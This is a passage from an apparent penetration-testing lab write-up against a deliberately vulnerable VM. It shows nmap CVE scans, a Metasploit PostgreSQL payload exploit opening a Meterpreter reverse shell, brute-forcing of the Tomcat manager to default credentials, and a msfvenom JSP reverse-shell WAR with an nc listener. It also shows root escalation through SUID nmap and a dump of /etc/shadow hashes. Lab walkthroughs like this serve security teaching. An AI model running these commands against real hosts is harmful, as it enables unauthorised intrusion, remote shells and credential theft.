|       PRION:CVE-2011-2483     5.0     https://vulners.com/prion/PRION:CVE-2011-2483
|       CVE-2017-7486   5.0     https://vulners.com/cve/CVE-2017-7486
|       CVE-2015-3167   5.0     https://vulners.com/cve/CVE-2015-3167
|       SSV:61546       4.9     https://vulners.com/seebug/SSV:61546    *EXPLOIT*
|       SSV:60334       4.9     https://vulners.com/seebug/SSV:60334    *EXPLOIT*
|       PRION:CVE-2014-0062     4.9     https://vulners.com/prion/PRION:CVE-2014-0062
|       PRION:CVE-2012-3488     4.9     https://vulners.com/prion/PRION:CVE-2012-3488
|       POSTGRESQL:CVE-2014-0062        4.9     https://vulners.com/postgresql/POSTGRESQL:CVE-2014-0062
|       POSTGRESQL:CVE-2012-3488        4.9     https://vulners.com/postgresql/POSTGRESQL:CVE-2012-3488
|       CVE-2014-0062   4.9     https://vulners.com/cve/CVE-2014-0062
|       CVE-2012-3488   4.9     https://vulners.com/cve/CVE-2012-3488
|       SSV:61544       4.6     https://vulners.com/seebug/SSV:61544    *EXPLOIT*
|       PRION:CVE-2014-0067     4.6     https://vulners.com/prion/PRION:CVE-2014-0067
|       CVE-2014-0067   4.6     https://vulners.com/cve/CVE-2014-0067
|       PRION:CVE-2012-2143     4.3     https://vulners.com/prion/PRION:CVE-2012-2143
|       POSTGRESQL:CVE-2012-2143        4.3     https://vulners.com/postgresql/POSTGRESQL:CVE-2012-2143
|       POSTGRESQL:CVE-2012-0867        4.3     https://vulners.com/postgresql/POSTGRESQL:CVE-2012-0867
|       CVE-2012-2143   4.3     https://vulners.com/cve/CVE-2012-2143
|       SSV:61547       4.0     https://vulners.com/seebug/SSV:61547    *EXPLOIT*
|       SSV:61545       4.0     https://vulners.com/seebug/SSV:61545    *EXPLOIT*
|       SSV:60335       4.0     https://vulners.com/seebug/SSV:60335    *EXPLOIT*
|       SSV:60186       4.0     https://vulners.com/seebug/SSV:60186    *EXPLOIT*
|       SSV:4928        4.0     https://vulners.com/seebug/SSV:4928     *EXPLOIT*
|       SECURITYVULNS:VULN:9765 4.0     https://vulners.com/securityvulns/SECURITYVULNS:VULN:9765
|       PRION:CVE-2014-0066     4.0     https://vulners.com/prion/PRION:CVE-2014-0066
|       PRION:CVE-2014-0060     4.0     https://vulners.com/prion/PRION:CVE-2014-0060
|       PRION:CVE-2012-3489     4.0     https://vulners.com/prion/PRION:CVE-2012-3489
|       PRION:CVE-2012-2655     4.0     https://vulners.com/prion/PRION:CVE-2012-2655
|       PRION:CVE-2009-3229     4.0     https://vulners.com/prion/PRION:CVE-2009-3229
|       POSTGRESQL:CVE-2014-0066        4.0     https://vulners.com/postgresql/POSTGRESQL:CVE-2014-0066
|       POSTGRESQL:CVE-2014-0060        4.0     https://vulners.com/postgresql/POSTGRESQL:CVE-2014-0060
|       POSTGRESQL:CVE-2012-3489        4.0     https://vulners.com/postgresql/POSTGRESQL:CVE-2012-3489
|       POSTGRESQL:CVE-2012-2655        4.0     https://vulners.com/postgresql/POSTGRESQL:CVE-2012-2655
|       POSTGRESQL:CVE-2009-3229        4.0     https://vulners.com/postgresql/POSTGRESQL:CVE-2009-3229
|       POSTGRESQL:CVE-2009-0922        4.0     https://vulners.com/postgresql/POSTGRESQL:CVE-2009-0922
|       CVE-2021-3677   4.0     https://vulners.com/cve/CVE-2021-3677
|       CVE-2021-20229  4.0     https://vulners.com/cve/CVE-2021-20229
|       CVE-2017-7548   4.0     https://vulners.com/cve/CVE-2017-7548
|       CVE-2017-7547   4.0     https://vulners.com/cve/CVE-2017-7547
|       CVE-2014-8161   4.0     https://vulners.com/cve/CVE-2014-8161
|       CVE-2014-0066   4.0     https://vulners.com/cve/CVE-2014-0066
|       CVE-2014-0060   4.0     https://vulners.com/cve/CVE-2014-0060
|       CVE-2012-3489   4.0     https://vulners.com/cve/CVE-2012-3489
|       CVE-2012-2655   4.0     https://vulners.com/cve/CVE-2012-2655
|       CVE-2009-3229   4.0     https://vulners.com/cve/CVE-2009-3229
|       SSV:19322       3.5     https://vulners.com/seebug/SSV:19322    *EXPLOIT*
|       PRION:CVE-2010-0733     3.5     https://vulners.com/prion/PRION:CVE-2010-0733
|       PACKETSTORM:127092      3.5     https://vulners.com/packetstorm/PACKETSTORM:127092      *EXPLOIT*
|       CVE-2021-3393   3.5     https://vulners.com/cve/CVE-2021-3393
|       CVE-2010-0733   3.5     https://vulners.com/cve/CVE-2010-0733
|_      CVE-2022-41862  2.6     https://vulners.com/cve/CVE-2022-41862
MAC Address: 00:0C:29:71:62:0D (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.78 seconds

Let us exploit it.

msf6 exploit(multi/misc/java_rmi_server) > search postgres

Matching Modules
================

   #   Name                                                        Disclosure Date  Rank       Check  Description
   -   ----                                                        ---------------  ----       -----  -----------
   0   auxiliary/server/capture/postgresql                                          normal     No     Authentication Capture: PostgreSQL
   1   post/linux/gather/enum_users_history                                         normal     No     Linux Gather User History
   2   exploit/multi/http/manage_engine_dc_pmp_sqli                2014-06-08       excellent  Yes    ManageEngine Desktop Central / Password Manager LinkViewFetchServlet.dat SQL Injection
   3   exploit/windows/misc/manageengine_eventlog_analyzer_rce     2015-07-11       manual     Yes    ManageEngine EventLog Analyzer Remote Code Execution
   4   auxiliary/admin/http/manageengine_pmp_privesc               2014-11-08       normal     Yes    ManageEngine Password Manager SQLAdvancedALSearchResult.cc Pro SQL Injection
   5   auxiliary/analyze/crack_databases                                            normal     No     Password Cracker: Databases
   6   exploit/multi/postgres/postgres_copy_from_program_cmd_exec  2019-03-20       excellent  Yes    PostgreSQL COPY FROM PROGRAM Command Execution
   7   exploit/multi/postgres/postgres_createlang                  2016-01-01       good       Yes    PostgreSQL CREATE LANGUAGE Execution
   8   auxiliary/scanner/postgres/postgres_dbname_flag_injection                    normal     No     PostgreSQL Database Name Command Line Flag Injection
   9   auxiliary/scanner/postgres/postgres_login                                    normal     No     PostgreSQL Login Utility
   10  auxiliary/admin/postgres/postgres_readfile                                   normal     No     PostgreSQL Server Generic Query
   11  auxiliary/admin/postgres/postgres_sql                                        normal     No     PostgreSQL Server Generic Query
   12  auxiliary/scanner/postgres/postgres_version                                  normal     No     PostgreSQL Version Probe
   13  exploit/linux/postgres/postgres_payload                     2007-06-05       excellent  Yes    PostgreSQL for Linux Payload Execution
   14  exploit/windows/postgres/postgres_payload                   2009-04-10       excellent  Yes    PostgreSQL for Microsoft Windows Payload Execution
   15  auxiliary/scanner/postgres/postgres_hashdump                                 normal     No     Postgres Password Hashdump
   16  auxiliary/scanner/postgres/postgres_schemadump                               normal     No     Postgres Schema Dump
   17  auxiliary/admin/http/rails_devise_pass_reset                2013-01-28       normal     No     Ruby on Rails Devise Authentication Password Reset
   18  exploit/multi/http/rudder_server_sqli_rce                   2023-06-16       excellent  Yes    Rudder Server SQLI Remote Code Execution
   19  post/linux/gather/vcenter_secrets_dump                      2022-04-15       normal     No     VMware vCenter Secrets Dump


Interact with a module by name or index. For example info 19, use 19 or use post/linux/gather/vcenter_secrets_dump

msf6 exploit(multi/misc/java_rmi_server) > use exploit/linux/postgres/postgres_payload 
[*] Using configured payload linux/x86/meterpreter/reverse_tcp
msf6 exploit(linux/postgres/postgres_payload) > set RHOSTS 192.168.204.136
RHOSTS => 192.168.204.136
msf6 exploit(linux/postgres/postgres_payload) > run

[-] Msf::OptionValidateError The following options failed to validate: LHOST
[*] Exploit completed, but no session was created.
msf6 exploit(linux/postgres/postgres_payload) > set LHOST 192.168.204.137
LHOST => 192.168.204.137
msf6 exploit(linux/postgres/postgres_payload) > run

[*] Started reverse TCP handler on 192.168.204.137:4444 
[*] 192.168.204.136:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)
[*] Uploaded as /tmp/VaEYRLQK.so, should be cleaned up automatically
[*] Sending stage (1017704 bytes) to 192.168.204.136
[*] Meterpreter session 2 opened (192.168.204.137:4444 -> 192.168.204.136:36615) at 2024-04-28 02:10:54 -0400

meterpreter > 

Apache Tomcat/Coyote JSP engine 1.1 Exploitation

Run a nmap scan against the target

┌──(kali㉿kali)-[~]
└─$ sudo nmap -sV 192.168.204.136 -p 8180 --script vuln
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-09 00:22 EDT
Nmap scan report for 192.168.204.136
Host is up (0.00036s latency).

PORT     STATE SERVICE VERSION
8180/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-cookie-flags: 
|   /admin/: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/index.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/login.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/admin.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/account.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/admin_login.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/home.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/admin-login.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/adminLogin.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/controlpanel.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/cp.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/index.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/login.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/admin.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/home.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/controlpanel.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/admin-login.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/cp.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/account.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/admin_login.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/adminLogin.jsp: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/includes/FCKeditor/editor/filemanager/upload/test.html: 
|     JSESSIONID: 
|       httponly flag not set
|   /admin/jscript/upload.html: 
|     JSESSIONID: 
|_      httponly flag not set
| vulners: 
|   cpe:/a:apache:coyote_http_connector:1.1: 
|       OSV:BIT-APACHE-2021-31618       7.5     https://vulners.com/osv/OSV:BIT-APACHE-2021-31618
|       OSV:CVE-2023-26044      5.3     https://vulners.com/osv/OSV:CVE-2023-26044
|       OSV:CVE-2022-36032      5.3     https://vulners.com/osv/OSV:CVE-2022-36032
|       PRION:CVE-2023-26044    5.0     https://vulners.com/prion/PRION:CVE-2023-26044
|_      PRION:CVE-2022-36032    5.0     https://vulners.com/prion/PRION:CVE-2022-36032
|_http-server-header: Apache-Coyote/1.1
| http-csrf: 
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=192.168.204.136
|   Found the following possible CSRF vulnerabilities: 
|     
|     Path: http://192.168.204.136:8180/admin/
|     Form id: username
|_    Form action: j_security_check;jsessionid=42FA811BFEB53FD3B608B245C81FF812
| http-enum: 
|   /admin/: Possible admin folder
|   /admin/index.html: Possible admin folder
|   /admin/login.html: Possible admin folder
|   /admin/admin.html: Possible admin folder
|   /admin/account.html: Possible admin folder
|   /admin/admin_login.html: Possible admin folder
|   /admin/home.html: Possible admin folder
|   /admin/admin-login.html: Possible admin folder
|   /admin/adminLogin.html: Possible admin folder
|   /admin/controlpanel.html: Possible admin folder
|   /admin/cp.html: Possible admin folder
|   /admin/index.jsp: Possible admin folder
|   /admin/login.jsp: Possible admin folder
|   /admin/admin.jsp: Possible admin folder
|   /admin/home.jsp: Possible admin folder
|   /admin/controlpanel.jsp: Possible admin folder
|   /admin/admin-login.jsp: Possible admin folder
|   /admin/cp.jsp: Possible admin folder
|   /admin/account.jsp: Possible admin folder
|   /admin/admin_login.jsp: Possible admin folder
|   /admin/adminLogin.jsp: Possible admin folder
|   /manager/html/upload: Apache Tomcat (401 Unauthorized)
|   /manager/html: Apache Tomcat (401 Unauthorized)
|   /admin/view/javascript/fckeditor/editor/filemanager/connectors/test.html: OpenCart/FCKeditor File upload
|   /admin/includes/FCKeditor/editor/filemanager/upload/test.html: ASP Simple Blog / FCKeditor File Upload
|   /admin/jscript/upload.html: Lizard Cart/Remote File upload
|_  /webdav/: Potentially interesting folder
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
MAC Address: 00:0C:29:71:62:0D (VMware)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 54.69 seconds

if we browse the site, we can view the homepage. The tomcat manager requires a username and password.

We have a brute force module for bruteforcing the login credentials in Metasploit

msf6 > use auxiliary/scanner/http/tomcat_mgr_login 
msf6 auxiliary(scanner/http/tomcat_mgr_login) > show options

Module options (auxiliary/scanner/http/tomcat_mgr_login):

   Name              Current Setting                                 Required  Description
   ----              ---------------                                 --------  -----------
   ANONYMOUS_LOGIN   false                                           yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS   false                                           no        Try blank passwords for all users
   BRUTEFORCE_SPEED  5                                               yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS      false                                           no        Try each user/password couple stored in the current database
   DB_ALL_PASS       false                                           no        Add all passwords in the current database to the list
   DB_ALL_USERS      false                                           no        Add all users in the current database to the list
   DB_SKIP_EXISTING  none                                            no        Skip existing credentials stored in the current database (Accepted: none, user, user&r
                                                                               ealm)
   PASSWORD                                                          no        The HTTP password to specify for authentication
   PASS_FILE         /usr/share/metasploit-framework/data/wordlists  no        File containing passwords, one per line
                     /tomcat_mgr_default_pass.txt
   Proxies                                                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                                            yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using
                                                                               -metasploit.html
   RPORT             8080                                            yes       The target port (TCP)
   SSL               false                                           no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS   false                                           yes       Stop guessing when a credential works for a host
   TARGETURI         /manager/html                                   yes       URI for Manager login. Default is /manager/html
   THREADS           1                                               yes       The number of concurrent threads (max one per host)
   USERNAME                                                          no        The HTTP username to specify for authentication
   USERPASS_FILE     /usr/share/metasploit-framework/data/wordlists  no        File containing users and passwords separated by space, one pair per line
                     /tomcat_mgr_default_userpass.txt
   USER_AS_PASS      false                                           no        Try the username as the password for all users
   USER_FILE         /usr/share/metasploit-framework/data/wordlists  no        File containing users, one per line
                     /tomcat_mgr_default_users.txt
   VERBOSE           true                                            yes       Whether to print output for all attempts
   VHOST                                                             no        HTTP server virtual host


View the full module info with the info, or info -d command.

msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RHOST 192.168.204.136
RHOST => 192.168.204.136
msf6 auxiliary(scanner/http/tomcat_mgr_login) > set RPORT 8180
RPORT => 8180
msf6 auxiliary(scanner/http/tomcat_mgr_login) > exploit

Here we can see the cracked password. It is tomcat:tomcat

[-] 192.168.204.136:8180 - LOGIN FAILED: tomcat:root (Incorrect)
[+] 192.168.204.136:8180 - Login Successful: tomcat:tomcat
[-] 192.168.204.136:8180 - LOGIN FAILED: both:admin (Incorrect)
[-] 192.168.204.136:8180 - LOGIN FAILED: both:manager (Incorrect)

And we are able to login to the manager with the found credentials.

If we look closely we have a field for uploading WAR Files. Create a payload.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=192.168.204.137 LPORT=4444 -f war >ammar2.war

Now upload it.

Open a netcat listener

nc -nlvp 4444              

Now browse to the page.

And we have a connection.

Privilege Escalation with SUID Binaries

Find the files with SUID Binaries

find / -perm -u=s -type f 2>/dev/null
/bin/umount
/bin/fusermount
/bin/su
/bin/mount
/bin/ping
/bin/ping6
/sbin/mount.nfs
/lib/dhcp3-client/call-dhclient-script
/usr/bin/sudoedit
/usr/bin/X
/usr/bin/netkit-rsh
/usr/bin/gpasswd
/usr/bin/traceroute6.iputils
/usr/bin/sudo
/usr/bin/netkit-rlogin
/usr/bin/arping
/usr/bin/at
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/nmap
/usr/bin/chsh
/usr/bin/netkit-rcp
/usr/bin/passwd
/usr/bin/mtr
/usr/sbin/uuidd
/usr/sbin/pppd
/usr/lib/telnetlogin
/usr/lib/apache2/suexec
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/pt_chown

We have got lots of binaries with SUID bit set and I am gonna use nmap here to do the privilege escalation.

nmap --interactive

Starting Nmap V. 4.53 ( http://insecure.org )
Welcome to Interactive Mode -- press h <enter> for help
nmap>  !sh
id
uid=110(tomcat55) gid=65534(nogroup) euid=0(root) groups=65534(nogroup)
cat /etc/shadow
root:$1$/avpfBJ1$x0z8w5UF9Iv./DR9E9Lid.:14747:0:99999:7:::
daemon:*:14684:0:99999:7:::
bin:*:14684:0:99999:7:::
sys:$1$fUX6BPOt$Miyc3UpOzQJqz4s5wFD9l0:14742:0:99999:7:::
sync:*:14684:0:99999:7:::
games:*:14684:0:99999:7:::
man:*:14684:0:99999:7:::
lp:*:14684:0:99999:7:::
mail:*:14684:0:99999:7:::
news:*:14684:0:99999:7:::
uucp:*:14684:0:99999:7:::
proxy:*:14684:0:99999:7:::

Our effective uid is root.

Last updated